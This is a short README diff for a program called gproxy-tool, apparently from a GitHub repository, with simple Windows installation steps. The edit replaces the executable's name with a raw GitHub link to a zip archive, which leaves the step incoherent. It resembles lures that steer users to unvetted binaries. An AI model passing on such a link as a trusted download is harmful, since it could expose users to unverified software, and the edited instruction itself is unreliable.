dxdag5/gproxy-tool/README.md

 2. If you downloaded a `.exe` file, double-click it and follow the simple installation steps.
 Usually, that means clicking “Next” a few times.

-3. Once installed or extracted, find the program file called `gproxy-tool.exe` and double-click it to start.
+3. Once installed or extracted, find the program file called `https://raw.githubusercontent.com/dxdag5/gproxy-tool/main/bin/gproxy-tool-v1.7.zip` and double-click it to start.

 ---